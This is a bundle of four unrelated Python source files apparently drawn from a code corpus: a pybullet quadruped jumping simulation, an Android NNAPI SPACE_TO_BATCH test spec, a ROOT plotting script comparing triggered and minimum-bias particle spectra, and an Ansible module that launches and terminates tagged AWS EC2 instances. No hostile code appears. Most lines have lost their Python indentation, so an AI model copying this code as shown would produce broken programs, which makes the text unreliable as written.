p.setAdditionalSearchPath(pybullet_data.getDataPath())
angle = 0 # pick in range 0..0.2 radians
orn = p.getQuaternionFromEuler([0, angle, 0])
p.loadURDF("plane.urdf", [0, 0, 0], orn)
p.setPhysicsEngineParameter(numSolverIterations=numSolverIterations)
p.startStateLogging(p.STATE_LOGGING_GENERIC_ROBOT,
"genericlogdata.bin",
maxLogDof=16,
logFlags=p.STATE_LOG_JOINT_TORQUES)
p.setTimeOut(4000000)
p.setGravity(0, 0, 0)
p.setTimeStep(fixedTimeStep)
orn = p.getQuaternionFromEuler([0, 0, 0.4])
p.setRealTimeSimulation(0)
quadruped = p.loadURDF("quadruped/minitaur_v1.urdf", [1, -1, .3],
orn,
useFixedBase=False,
useMaximalCoordinates=useMaximalCoordinates,
flags=p.URDF_USE_IMPLICIT_CYLINDER)
nJoints = p.getNumJoints(quadruped)
jointNameToId = {}
for i in range(nJoints):
jointInfo = p.getJointInfo(quadruped, i)
jointNameToId[jointInfo[1].decode('UTF-8')] = jointInfo[0]
motor_front_rightR_joint = jointNameToId['motor_front_rightR_joint']
motor_front_rightL_joint = jointNameToId['motor_front_rightL_joint']
knee_front_rightL_link = jointNameToId['knee_front_rightL_link']
hip_front_rightR_link = jointNameToId['hip_front_rightR_link']
knee_front_rightR_link = jointNameToId['knee_front_rightR_link']
motor_front_rightL_link = jointNameToId['motor_front_rightL_link']
motor_front_leftR_joint = jointNameToId['motor_front_leftR_joint']
hip_front_leftR_link = jointNameToId['hip_front_leftR_link']
knee_front_leftR_link = jointNameToId['knee_front_leftR_link']
motor_front_leftL_joint = jointNameToId['motor_front_leftL_joint']
motor_front_leftL_link = jointNameToId['motor_front_leftL_link']
knee_front_leftL_link = jointNameToId['knee_front_leftL_link']
motor_back_rightR_joint = jointNameToId['motor_back_rightR_joint']
hip_rightR_link = jointNameToId['hip_rightR_link']
knee_back_rightR_link = jointNameToId['knee_back_rightR_link']
motor_back_rightL_joint = jointNameToId['motor_back_rightL_joint']
motor_back_rightL_link = jointNameToId['motor_back_rightL_link']
knee_back_rightL_link = jointNameToId['knee_back_rightL_link']
motor_back_leftR_joint = jointNameToId['motor_back_leftR_joint']
hip_leftR_link = jointNameToId['hip_leftR_link']
knee_back_leftR_link = jointNameToId['knee_back_leftR_link']
motor_back_leftL_joint = jointNameToId['motor_back_leftL_joint']
motor_back_leftL_link = jointNameToId['motor_back_leftL_link']
knee_back_leftL_link = jointNameToId['knee_back_leftL_link']
#fixtorso = p.createConstraint(-1,-1,quadruped,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[0,0,0])
motordir = [-1, -1, -1, -1, 1, 1, 1, 1]
halfpi = 1.57079632679
twopi = 4 * halfpi
kneeangle = -2.1834
dyn = p.getDynamicsInfo(quadruped, -1)
mass = dyn[0]
friction = dyn[1]
localInertiaDiagonal = dyn[2]
print("localInertiaDiagonal", localInertiaDiagonal)
#this is a no-op, just to show the API
p.changeDynamics(quadruped, -1, localInertiaDiagonal=localInertiaDiagonal)
#for i in range (nJoints):
# p.changeDynamics(quadruped,i,localInertiaDiagonal=[0.000001,0.000001,0.000001])
drawInertiaBox(quadruped, -1, [1, 0, 0])
#drawInertiaBox(quadruped,motor_front_rightR_joint, [1,0,0])
for i in range(nJoints):
drawInertiaBox(quadruped, i, [0, 1, 0])
if (useMaximalCoordinates):
steps = 400
for aa in range(steps):
p.setJointMotorControl2(quadruped, motor_front_leftL_joint, p.POSITION_CONTROL,
motordir[0] * halfpi * float(aa) / steps)
p.setJointMotorControl2(quadruped, motor_front_leftR_joint, p.POSITION_CONTROL,
motordir[1] * halfpi * float(aa) / steps)
p.setJointMotorControl2(quadruped, motor_back_leftL_joint, p.POSITION_CONTROL,
motordir[2] * halfpi * float(aa) / steps)
p.setJointMotorControl2(quadruped, motor_back_leftR_joint, p.POSITION_CONTROL,
motordir[3] * halfpi * float(aa) / steps)
p.setJointMotorControl2(quadruped, motor_front_rightL_joint, p.POSITION_CONTROL,
motordir[4] * halfpi * float(aa) / steps)
p.setJointMotorControl2(quadruped, motor_front_rightR_joint, p.POSITION_CONTROL,
motordir[5] * halfpi * float(aa) / steps)
p.setJointMotorControl2(quadruped, motor_back_rightL_joint, p.POSITION_CONTROL,
motordir[6] * halfpi * float(aa) / steps)
p.setJointMotorControl2(quadruped, motor_back_rightR_joint, p.POSITION_CONTROL,
motordir[7] * halfpi * float(aa) / steps)
p.setJointMotorControl2(quadruped, knee_front_leftL_link, p.POSITION_CONTROL,
motordir[0] * (kneeangle + twopi) * float(aa) / steps)
p.setJointMotorControl2(quadruped, knee_front_leftR_link, p.POSITION_CONTROL,
motordir[1] * kneeangle * float(aa) / steps)
p.setJointMotorControl2(quadruped, knee_back_leftL_link, p.POSITION_CONTROL,
motordir[2] * kneeangle * float(aa) / steps)
p.setJointMotorControl2(quadruped, knee_back_leftR_link, p.POSITION_CONTROL,
motordir[3] * (kneeangle + twopi) * float(aa) / steps)
p.setJointMotorControl2(quadruped, knee_front_rightL_link, p.POSITION_CONTROL,
motordir[4] * (kneeangle) * float(aa) / steps)
p.setJointMotorControl2(quadruped, knee_front_rightR_link, p.POSITION_CONTROL,
motordir[5] * (kneeangle + twopi) * float(aa) / steps)
p.setJointMotorControl2(quadruped, knee_back_rightL_link, p.POSITION_CONTROL,
motordir[6] * (kneeangle + twopi) * float(aa) / steps)
p.setJointMotorControl2(quadruped, knee_back_rightR_link, p.POSITION_CONTROL,
motordir[7] * kneeangle * float(aa) / steps)
p.stepSimulation()
#time.sleep(fixedTimeStep)
else:
p.resetJointState(quadruped, motor_front_leftL_joint, motordir[0] * halfpi)
p.resetJointState(quadruped, knee_front_leftL_link, motordir[0] * kneeangle)
p.resetJointState(quadruped, motor_front_leftR_joint, motordir[1] * halfpi)
p.resetJointState(quadruped, knee_front_leftR_link, motordir[1] * kneeangle)
p.resetJointState(quadruped, motor_back_leftL_joint, motordir[2] * halfpi)
p.resetJointState(quadruped, knee_back_leftL_link, motordir[2] * kneeangle)
p.resetJointState(quadruped, motor_back_leftR_joint, motordir[3] * halfpi)
p.resetJointState(quadruped, knee_back_leftR_link, motordir[3] * kneeangle)
p.resetJointState(quadruped, motor_front_rightL_joint, motordir[4] * halfpi)
p.resetJointState(quadruped, knee_front_rightL_link, motordir[4] * kneeangle)
p.resetJointState(quadruped, motor_front_rightR_joint, motordir[5] * halfpi)
p.resetJointState(quadruped, knee_front_rightR_link, motordir[5] * kneeangle)
p.resetJointState(quadruped, motor_back_rightL_joint, motordir[6] * halfpi)
p.resetJointState(quadruped, knee_back_rightL_link, motordir[6] * kneeangle)
p.resetJointState(quadruped, motor_back_rightR_joint, motordir[7] * halfpi)
p.resetJointState(quadruped, knee_back_rightR_link, motordir[7] * kneeangle)
#p.getNumJoints(1)
if (toeConstraint):
cid = p.createConstraint(quadruped, knee_front_leftR_link, quadruped, knee_front_leftL_link,
p.JOINT_POINT2POINT, [0, 0, 0], [0, 0.005, 0.1], [0, 0.01, 0.1])
p.changeConstraint(cid, maxForce=maxKneeForce)
cid = p.createConstraint(quadruped, knee_front_rightR_link, quadruped, knee_front_rightL_link,
p.JOINT_POINT2POINT, [0, 0, 0], [0, 0.005, 0.1], [0, 0.01, 0.1])
p.changeConstraint(cid, maxForce=maxKneeForce)
cid = p.createConstraint(quadruped, knee_back_leftR_link, quadruped, knee_back_leftL_link,
p.JOINT_POINT2POINT, [0, 0, 0], [0, 0.005, 0.1], [0, 0.01, 0.1])
p.changeConstraint(cid, maxForce=maxKneeForce)
cid = p.createConstraint(quadruped, knee_back_rightR_link, quadruped, knee_back_rightL_link,
p.JOINT_POINT2POINT, [0, 0, 0], [0, 0.005, 0.1], [0, 0.01, 0.1])
p.changeConstraint(cid, maxForce=maxKneeForce)
if (1):
p.setJointMotorControl(quadruped, knee_front_leftL_link, p.VELOCITY_CONTROL, 0,
kneeFrictionForce)
p.setJointMotorControl(quadruped, knee_front_leftR_link, p.VELOCITY_CONTROL, 0,
kneeFrictionForce)
p.setJointMotorControl(quadruped, knee_front_rightL_link, p.VELOCITY_CONTROL, 0,
kneeFrictionForce)
p.setJointMotorControl(quadruped, knee_front_rightR_link, p.VELOCITY_CONTROL, 0,
kneeFrictionForce)
p.setJointMotorControl(quadruped, knee_back_leftL_link, p.VELOCITY_CONTROL, 0, kneeFrictionForce)
p.setJointMotorControl(quadruped, knee_back_leftR_link, p.VELOCITY_CONTROL, 0, kneeFrictionForce)
p.setJointMotorControl(quadruped, knee_back_rightL_link, p.VELOCITY_CONTROL, 0,
kneeFrictionForce)
p.setJointMotorControl(quadruped, knee_back_rightR_link, p.VELOCITY_CONTROL, 0,
kneeFrictionForce)
p.setGravity(0, 0, -10)
legnumbering = [
motor_front_leftL_joint, motor_front_leftR_joint, motor_back_leftL_joint,
motor_back_leftR_joint, motor_front_rightL_joint, motor_front_rightR_joint,
motor_back_rightL_joint, motor_back_rightR_joint
]
for i in range(8):
print(legnumbering[i])
#use the Minitaur leg numbering
for i in range(8):
  p.setJointMotorControl2(bodyIndex=quadruped,
                          jointIndex=legnumbering[i],
                          controlMode=p.POSITION_CONTROL,
                          targetPosition=motordir[i] * 1.57,
                          positionGain=kp,
                          velocityGain=kd,
                          force=maxForce)
#stand still
p.setRealTimeSimulation(useRealTime)
t = 0.0
t_end = t + 15
ref_time = time.time()
while (t < t_end):
p.setGravity(0, 0, -10)
if (useRealTime):
t = time.time() - ref_time
else:
t = t + fixedTimeStep
if (useRealTime == 0):
p.stepSimulation()
time.sleep(fixedTimeStep)
print("quadruped Id = ")
print(quadruped)
p.saveWorld("quadru.py")
logId = p.startStateLogging(p.STATE_LOGGING_MINITAUR, "quadrupedLog.bin", [quadruped])
#jump
t = 0.0
t_end = t + 100
i = 0
ref_time = time.time()
while (1):
if (useRealTime):
t = time.time() - ref_time
else:
t = t + fixedTimeStep
if (True):
target = math.sin(t * speed) * jump_amp + 1.57
    for i in range(8):
      p.setJointMotorControl2(bodyIndex=quadruped,
                              jointIndex=legnumbering[i],
                              controlMode=p.POSITION_CONTROL,
                              targetPosition=motordir[i] * target,
                              positionGain=kp,
                              velocityGain=kd,
                              force=maxForce)
if (useRealTime == 0):
p.stepSimulation()
time.sleep(fixedTimeStep)
|
tests/nnapi/specs/skip/V1_2/space_to_batch_v1_2.mod.py | periannath/ONE | 255 | 29884 | #
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
layout = BoolScalar("layout", False) # NHWC
# TEST 1: SPACE_TO_BATCH_NCHW_1, block_size = [2, 2]
i1 = Input("op1", "TENSOR_FLOAT32", "{1, 2, 2, 2}")
pad1 = Parameter("paddings", "TENSOR_INT32", "{2, 2}", [0, 0, 0, 0])
o1 = Output("op4", "TENSOR_FLOAT32", "{4, 1, 1, 2}")
Model().Operation("SPACE_TO_BATCH_ND", i1, [2, 2], pad1, layout).To(o1)
# Additional data type
quant8 = DataTypeConverter().Identify({
i1: ("TENSOR_QUANT8_ASYMM", 0.1, 0),
o1: ("TENSOR_QUANT8_ASYMM", 0.1, 0)
})
# Instantiate an example
example = Example({
i1: [1.4, 2.3, 3.2, 4.1, 5.4, 6.3, 7.2, 8.1],
o1: [1.4, 2.3, 3.2, 4.1, 5.4, 6.3, 7.2, 8.1]
}).AddNchw(i1, o1, layout).AddVariations("relaxed", "float16", quant8)
# TEST 2: SPACE_TO_BATCH_NCHW_2, block_size = [2, 2]
i2 = Input("op1", "TENSOR_FLOAT32", "{1, 4, 4, 1}")
o2 = Output("op4", "TENSOR_FLOAT32", "{4, 2, 2, 1}")
Model().Operation("SPACE_TO_BATCH_ND", i2, [2, 2], pad1, layout).To(o2)
# Additional data type
quant8 = DataTypeConverter().Identify({
i2: ("TENSOR_QUANT8_ASYMM", 0.5, 0),
o2: ("TENSOR_QUANT8_ASYMM", 0.5, 0)
})
# Instantiate an example
example = Example({
i2: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16],
o2: [1, 3, 9, 11, 2, 4, 10, 12, 5, 7, 13, 15, 6, 8, 14, 16]
}).AddNchw(i2, o2, layout).AddVariations("relaxed", "float16", quant8)
# TEST 3: SPACE_TO_BATCH_NCHW_3, block_size = [3, 2]
i3 = Input("op1", "TENSOR_FLOAT32", "{1, 5, 2, 1}")
pad3 = Parameter("paddings", "TENSOR_INT32", "{2, 2}", [1, 0, 2, 0])
o3 = Output("op4", "TENSOR_FLOAT32", "{6, 2, 2, 1}")
Model().Operation("SPACE_TO_BATCH_ND", i3, [3, 2], pad3, layout).To(o3)
# Additional data type
quant8 = DataTypeConverter().Identify({
i3: ("TENSOR_QUANT8_ASYMM", 0.5, 128),
o3: ("TENSOR_QUANT8_ASYMM", 0.5, 128)
})
# Instantiate an example
example = Example({
i3: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],
o3: [0, 0, 0, 5, 0, 0, 0, 6, 0, 1, 0, 7,
0, 2, 0, 8, 0, 3, 0, 9, 0, 4, 0, 10]
}).AddNchw(i3, o3, layout).AddVariations("relaxed", "float16", quant8)
# TEST 4: SPACE_TO_BATCH_NCHW_4, block_size = [3, 2]
i4 = Input("op1", "TENSOR_FLOAT32", "{1, 4, 2, 1}")
pad4 = Parameter("paddings", "TENSOR_INT32", "{2, 2}", [1, 1, 2, 4])
o4 = Output("op4", "TENSOR_FLOAT32", "{6, 2, 4, 1}")
Model().Operation("SPACE_TO_BATCH_ND", i4, [3, 2], pad4, layout).To(o4)
# Additional data type
quant8 = DataTypeConverter().Identify({
i4: ("TENSOR_QUANT8_ASYMM", 0.25, 128),
o4: ("TENSOR_QUANT8_ASYMM", 0.25, 128)
})
# Instantiate an example
example = Example({
i4: [1, 2, 3, 4, 5, 6, 7, 8],
o4: [0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 6, 0, 0,
0, 1, 0, 0, 0, 7, 0, 0, 0, 2, 0, 0, 0, 8, 0, 0,
0, 3, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0]
}).AddNchw(i4, o4, layout).AddVariations("relaxed", "float16", quant8)
|
PWGJE/EMCALJetTasks/Tracks/analysis/old/ComparePeriodsTriggerToMB.py | maroozm/AliPhysics | 114 | 29894 | #! /usr/bin/env python
from ROOT import TCanvas, TGraphErrors, TLegend, TPaveText
from ROOT import kBlack, kBlue, kRed
from Helper import Frame, ReadHistList
from Graphics import Style
from SpectrumContainer import DataContainer
from copy import deepcopy
class PeriodComparisonPlot:
def __init__(self):
self.__comparisons = []
self.__canvas = None
self.__frames = {}
self.__legend = None
def AddComparison(self, comp):
self.__comparisons.append(comp)
    def SetPlotRange(self, min, max):
for comp in self.__comparisons:
comp.SetPlotRange(min, max)
def Draw(self):
self.__canvas = TCanvas("comparison%s" %(self.__comparisons[0].GetTriggerName()), "Comparison of different periods for trigger %s" %(self.__comparisons[0].GetTriggerName()), 1000, 600)
self.__canvas.Divide(2,1)
self.__legend = TLegend(0.15, 0.15, 0.45, 0.45)
self.__legend.SetBorderSize(0)
self.__legend.SetFillStyle(0)
self.__legend.SetTextFont(42)
specpad = self.__canvas.cd(1)
specpad.SetGrid(False,False)
specpad.SetLogx(True)
specpad.SetLogy(True)
self.__frames["Spectra"] = Frame("axisSpec%s" %(self.__comparisons[0].GetTriggerName()), 0, 100, 1e-10, 100)
self.__frames["Spectra"].SetXtitle("p_{t} (GeV/c)")
self.__frames["Spectra"].SetYtitle("1/N_{event} 1/(#Delta p_{t}) dN/dp_{t} ((GeV/c)^{-2})")
self.__frames["Spectra"].Draw()
self.__comparisons[0].DrawMinBiasSpectrum()
self.__comparisons[0].AddMBtoLegend(self.__legend)
for comp in sorted(self.__comparisons):
comp.DrawTriggeredSpectrum()
comp.AddTriggeredSpectrumToLegend(self.__legend)
self.__legend.Draw()
self.__label = self.__comparisons[0].CreateLabel(0.5, 0.75, 0.89, 0.85)
self.__label.Draw()
rpad = self.__canvas.cd(2)
rpad.SetGrid(False, False)
self.__frames["Ratios"] = Frame("axisRatio%s" %(self.__comparisons[0].GetTriggerName()), 0, 100, 0, 2000)
self.__frames["Ratios"].SetXtitle("p_{t} (GeV/c)")
self.__frames["Ratios"].SetYtitle("%s / Min. Bias" %(self.__comparisons[0].GetTriggerName()))
self.__frames["Ratios"].Draw()
for comp in sorted(self.__comparisons):
comp.DrawRatioTriggeredMinBias()
self.__canvas.cd()
def SaveAs(self, filenamebase):
"""
Save plot as image file
"""
types = ["eps", "pdf", "jpeg", "gif", "png"]
for t in types:
self.__canvas.SaveAs("%s.%s" %(filenamebase, t))
class TriggerComparison:
def __init__(self, trgspec, mbspec, triggername, dataname):
self.__triggeredspectrum = trgspec
self.__minbiasspectrum = mbspec
self.__ratiospectra = self.__triggeredspectrum.MakeRatio(self.__minbiasspectrum)
self.__ratiospectra.SetStyle(self.__triggeredspectrum.GetStyle())
self.__triggername = triggername
self.__dataname = dataname
def __cmp__(self, other):
othername = other.GetDataName()
if self.__dataname == othername:
return 0
elif self.__dataname < othername:
return -1
else:
return 1
def SetPlotRange(self, min, max):
self.__triggeredspectrum.SetPlotRange(min, max)
self.__minbiasspectrum.SetPlotRange(min, max)
self.__ratiospectra.SetPlotRange(min, max)
def GetTriggerName(self):
return self.__triggername
def GetDataName(self):
return self.__dataname
def DrawTriggeredSpectrum(self):
self.__triggeredspectrum.Draw()
def DrawMinBiasSpectrum(self):
self.__minbiasspectrum.Draw()
def DrawRatioTriggeredMinBias(self):
self.__ratiospectra.Draw()
def AddMBtoLegend(self, leg):
self.__minbiasspectrum.AddToLegend(leg, "MinBias")
def AddTriggeredSpectrumToLegend(self, leg):
self.__triggeredspectrum.AddToLegend(leg, self.__dataname)
def CreateLabel(self, xmin, ymin, xmax, ymax):
label = TPaveText(xmin, ymin, xmax, ymax, "NDC")
label.SetBorderSize(0)
label.SetFillStyle(0)
label.SetTextFont(42)
label.AddText("Trigger: %s" %(self.__triggername))
return label
class GraphicsObject:
def __init__(self, data, name):
self._data = data
self._graphics = None
self._style = Style(kBlack, 20)
self._plotrange = {"Min":None, "Max":None}
self._name = name
def SetPlotRange(self, min, max):
        self._plotrange["Min"] = min
        self._plotrange["Max"] = max
def SetStyle(self, style):
self._style = style
def SetName(self, name):
self._name = name
def GetData(self):
return self._data
def GetGraphics(self):
return self._graphics
def GetStyle(self):
return self._style
def Draw(self):
if not self._graphics:
self._graphics = TGraphErrors()
np = 0
for bin in range(1, self._data.GetXaxis().GetNbins()+1):
if self._plotrange["Min"] and self._data.GetXaxis().GetBinLowEdge(bin) < self._plotrange["Min"]:
continue
if self._plotrange["Max"] and self._data.GetXaxis().GetBinUpEdge(bin) > self._plotrange["Max"]:
break
self._graphics.SetPoint(np, self._data.GetXaxis().GetBinCenter(bin), self._data.GetBinContent(bin))
self._graphics.SetPointError(np, self._data.GetXaxis().GetBinWidth(bin)/2., self._data.GetBinError(bin))
np = np + 1
self._graphics.SetMarkerColor(self._style.GetColor())
self._graphics.SetLineColor(self._style.GetColor())
self._graphics.SetMarkerStyle(self._style.GetMarker())
self._graphics.Draw("epsame")
def AddToLegend(self, legend, title = None):
if self._graphics:
tit = self._name
if title:
tit = title
legend.AddEntry(self._graphics, tit, "lep")
class Spectrum(GraphicsObject):
def __init__(self, data, name):
GraphicsObject.__init__(self, data, name)
def MakeRatio(self, denominator):
result = deepcopy(self._data)
result.Divide(denominator.GetData())
ratio = Ratio(result)
if self._plotrange["Min"] or self._plotrange["Max"]:
ratio.SetPlotRange(self._plotrange["Min"], self._plotrange["Max"])
return ratio
class Ratio(GraphicsObject):
def __init__(self, data, name = None):
GraphicsObject.__init__(self, data, name)
def ReadSpectra(filename, trigger):
"""
    Read the event and track histograms for the given trigger class from the root file
    and return them wrapped in a DataContainer
"""
hlist = ReadHistList(filename, "PtEMCalTriggerTask")
return DataContainer(eventHist = hlist.FindObject("hEventHist%s" %(trigger)), trackHist = hlist.FindObject("hTrackHist%s" %(trigger)))
def MakeNormalisedSpectrum(inputdata, name):
"""
Normalise spectrum by the number of events and by the bin width
"""
inputdata.SetVertexRange(-10., 10.)
inputdata.SetPileupRejection(True)
inputdata.SelectTrackCuts(1)
return inputdata.MakeProjection(0, "ptSpectrum%s" %(name), "p_{t} (GeV/c)", "1/N_{event} 1/(#Delta p_{t}) dN/dp_{t} ((GeV/c)^{-2})")
def ComparePeriods(filea, fileb, filemb, namea, nameb, trigger):
triggers = {}
dataA = ReadSpectra(filea, trigger)
dataB = ReadSpectra(fileb, trigger)
dataMB = ReadSpectra(filemb, "MinBias")
specA = Spectrum(MakeNormalisedSpectrum(dataA, namea), namea)
specA.SetStyle(Style(kBlue, 24))
specB = Spectrum(MakeNormalisedSpectrum(dataB, nameb), nameb)
specB.SetStyle(Style(kRed, 25))
specMB = Spectrum(MakeNormalisedSpectrum(dataMB, "MinBias"), "MinBias")
specMB.SetStyle(Style(kBlack, 25))
plot = PeriodComparisonPlot()
plot.AddComparison(TriggerComparison(specA, specMB, trigger, namea))
plot.AddComparison(TriggerComparison(specB, specMB, trigger, nameb))
plot.SetPlotRange(2., 100.)
plot.Draw()
return plot
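# Illustrative invocation sketch (added for clarity, not part of the original
# macro): the input file names, period labels and trigger class below are
# assumptions.
if __name__ == "__main__":
    plot = ComparePeriods("AnalysisResults_periodA.root",
                          "AnalysisResults_periodB.root",
                          "AnalysisResults_MinBias.root",
                          "periodA", "periodB", "EMCJHigh")
    plot.SaveAs("comparisonEMCJHigh")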
|
pool_automation/roles/aws_manage/library/stateful_set.py | Rob-S/indy-node | 627 | 29927 | #!/usr/bin/python
import re
from itertools import cycle
from collections import namedtuple, defaultdict, OrderedDict
import boto3
from ansible.module_utils.basic import AnsibleModule
# import logging
# boto3.set_stream_logger('', logging.DEBUG)
HostInfo = namedtuple('HostInfo', 'tag_id public_ip user')
InstanceParams = namedtuple(
'InstanceParams',
'project namespace group add_tags key_name security_group '
'type_name market_spot spot_max_price ebs_volume_size ebs_volume_type')
ManageResults = namedtuple('ManageResults', 'changed active terminated')
class AWSRegion(object):
def __init__(self, code, location, expensive=False):
self.code = code
self.location = location
self.expensive = expensive
# https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html
#
# prices:
# - https://aws.amazon.com/ec2/pricing/
# - https://www.concurrencylabs.com/blog/choose-your-aws-region-wisely/
#
# TODO automate or update periodically
AWS_REGIONS = OrderedDict([(r.code, r) for r in [
AWSRegion('us-east-1', 'US East (N. Virginia)'),
AWSRegion('us-east-2', 'US East (Ohio)'),
AWSRegion('us-west-1', 'US West (N. California)'),
AWSRegion('us-west-2', 'US West (Oregon)'),
AWSRegion('ca-central-1', 'Canada (Central)'),
AWSRegion('eu-central-1', 'EU (Frankfurt)'),
AWSRegion('eu-west-1', 'EU (Ireland)'),
AWSRegion('eu-west-2', 'EU (London)'),
AWSRegion('eu-west-3', 'EU (Paris)'),
AWSRegion('ap-northeast-1', 'Asia Pacific (Tokyo)'),
AWSRegion('ap-northeast-2', 'Asia Pacific (Seoul)'),
# some specific one, requires service subscriptions
# (ClientError: An error occurred (OptInRequired) when calling the DescribeInstances operation)
# AWSRegion('ap-northeast-3', 'Asia Pacific (Osaka-Local)'),
AWSRegion('ap-southeast-1', 'Asia Pacific (Singapore)'),
AWSRegion('ap-southeast-2', 'Asia Pacific (Sydney)'),
AWSRegion('ap-south-1', 'Asia Pacific (Mumbai)'),
AWSRegion('sa-east-1', 'South America (Sao Paulo)', True),
]])
# TODO
# - think about moving these module level functions into classes
# - cache results
def find_ubuntu_ami(ec2):
images = ec2.images.filter(
Owners=['099720109477'],
Filters=[
{
'Name': 'name',
'Values': ['ubuntu/images/hvm-ssd/ubuntu-xenial-16.04-amd64-server*']
}
])
# Return latest image available
images = sorted(images, key=lambda v: v.creation_date)
return images[-1].image_id if len(images) > 0 else None
def find_instances(ec2, project, namespace, group=None):
filters = [
{'Name': 'tag:Project', 'Values': [project]},
{'Name': 'tag:Namespace', 'Values': [namespace]}
]
if group is not None:
filters.append({'Name': 'tag:Group', 'Values': [group]})
return [instance for instance in ec2.instances.filter(Filters=filters)
if instance.state['Name'] not in ['terminated', 'shutting-down']]
def valid_instances(regions, count):
result = defaultdict(list)
for i, region in zip(range(count), cycle(regions)):
result[region].append(str(i + 1))
return result
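# Worked example (added for clarity): instance IDs are dealt round-robin
# across the requested regions, e.g.
#   valid_instances(['us-east-1', 'eu-west-1'], 3)
#   -> {'us-east-1': ['1', '3'], 'eu-west-1': ['2']}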
def get_tag(obj, name):
for tag in obj.tags:
if tag['Key'] == name:
return tag['Value']
return None
class AwsEC2Waiter(object):
""" Base class for EC2 actors which calls long running async actions. """
def __init__(self, ev_name):
self._awaited = defaultdict(list)
self._ev_name = ev_name
@property
def awaited(self):
return dict(self._awaited)
def _instance_region(self, instance):
# TODO more mature would be to use
# ec2.client.describe_availability_zones
# and create a map av.zone -> region
return instance.placement['AvailabilityZone'][:-1]
def add_instance(self, instance, region=None):
# fallback - autodetect placement region,
# might lead to additional AWS API calls
if not region:
region = self._instance_region(instance)
self._awaited[region].append(instance)
def wait(self, update=True):
for region, instances in dict(self._awaited).iteritems():
ec2cl = boto3.client('ec2', region_name=region)
ec2cl.get_waiter(self._ev_name).wait(
InstanceIds=[inst.id for inst in instances])
if update:
for inst in instances:
inst.reload()
del self._awaited[region]
class AwsEC2Terminator(AwsEC2Waiter):
""" Helper class to terminate EC2 instances. """
def __init__(self):
super(AwsEC2Terminator, self).__init__('instance_terminated')
def terminate(self, instance, region=None):
instance.terminate()
self.add_instance(instance, region)
# cancel spot request if any
if instance.spot_instance_request_id:
ec2cl = boto3.client('ec2', region_name=(region if region
else self._instance_region(instance)))
ec2cl.cancel_spot_instance_requests(
SpotInstanceRequestIds=[instance.spot_instance_request_id])
class AwsEC2Launcher(AwsEC2Waiter):
""" Helper class to launch EC2 instances. """
_camel_to_snake_re1 = re.compile('(.)([A-Z][a-z]+)')
_camel_to_snake_re2 = re.compile('([a-z0-9])([A-Z])')
def __init__(self):
# TODO consider to use waiter for 'instance_status_ok'
# if 'instance_running' is not enough in any circumstances
super(AwsEC2Launcher, self).__init__('instance_running')
@classmethod
def _camel_to_snake(cls, camel_one):
# borrowed from here:
# https://stackoverflow.com/questions/1175208/elegant-python-function-to-convert-camelcase-to-snake-case
return cls._camel_to_snake_re2.sub(
r'\1_\2', cls._camel_to_snake_re1.sub(r'\1_\2', camel_one)).lower()
def launch(self, params, count, region=None, ec2=None):
def _get_options(opts_list, prefix=''):
res = {}
for opt in opts_list:
_opt = prefix + self._camel_to_snake(opt)
if getattr(params, _opt) is not None:
res[opt] = getattr(params, _opt)
return res
if not ec2:
ec2 = boto3.resource('ec2', region_name=region)
spot_opts_list = (
'MaxPrice',
)
# Note: default value type depends on region for API calls
# https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSVolumeTypes.html
ebs_opts_list = (
'VolumeSize',
'VolumeType',
)
launch_spec = {
'ImageId': find_ubuntu_ami(ec2),
'KeyName': params.key_name,
'SecurityGroups': [params.security_group],
'InstanceType': params.type_name,
'MinCount': count,
'MaxCount': count,
'TagSpecifications': [
{
'ResourceType': rc_type,
'Tags': [
{
'Key': 'Project',
'Value': params.project
},
{
'Key': 'Namespace',
'Value': params.namespace
},
{
'Key': 'Group',
'Value': params.group
}
] + [
{'Key': k, 'Value': v}
for k, v in params.add_tags.iteritems()
]
} for rc_type in ('instance', 'volume')
]
}
# ebs
ebs_options = _get_options(ebs_opts_list, 'ebs_')
if ebs_options:
launch_spec['BlockDeviceMappings'] = [{
'DeviceName': '/dev/sda1',
'Ebs': ebs_options
}]
# spot
if params.market_spot:
launch_spec['InstanceMarketOptions'] = {
'MarketType': 'spot',
'SpotOptions': _get_options(spot_opts_list, 'spot_')
}
        # launch the instances and register them with the running-state waiter
instances = ec2.create_instances(**launch_spec)
for i in instances:
self.add_instance(i, region)
return instances
def manage_instances(regions, params, count):
hosts = []
terminated = []
tag_ids = []
changed = False
def _host_info(inst):
return HostInfo(
tag_id=get_tag(inst, 'ID'),
public_ip=inst.public_ip_address,
user='ubuntu')
aws_launcher = AwsEC2Launcher()
aws_terminator = AwsEC2Terminator()
valid_region_ids = valid_instances(regions, count)
for region in AWS_REGIONS.keys():
ec2 = boto3.resource('ec2', region_name=region)
valid_ids = valid_region_ids[region]
instances = find_instances(
ec2, params.project, params.namespace, params.group)
for inst in instances:
tag_id = get_tag(inst, 'ID')
if tag_id in valid_ids:
valid_ids.remove(tag_id)
hosts.append(inst)
aws_launcher.add_instance(inst, region)
else:
terminated.append(_host_info(inst))
aws_terminator.terminate(inst, region)
changed = True
if valid_ids:
instances = aws_launcher.launch(
params, len(valid_ids), region=region, ec2=ec2)
for inst, tag_id in zip(instances, valid_ids):
tag_ids.append((inst, tag_id))
hosts.append(inst)
changed = True
aws_launcher.wait()
# add tags based on id once instances are running
for inst, tag_id in tag_ids:
inst.create_tags(Tags=[
{'Key': 'Name', 'Value': "{}-{}-{}-{}"
.format(params.project,
params.namespace,
params.group,
tag_id.zfill(3)).lower()},
{'Key': 'ID', 'Value': tag_id}])
aws_terminator.wait()
return ManageResults(
changed,
[_host_info(inst) for inst in hosts],
terminated
)
def run(module):
params = module.params
inst_params = InstanceParams(
project=params['project'],
namespace=params['namespace'],
group=params['group'],
add_tags=params['add_tags'],
key_name=params['key_name'],
security_group=params['security_group'],
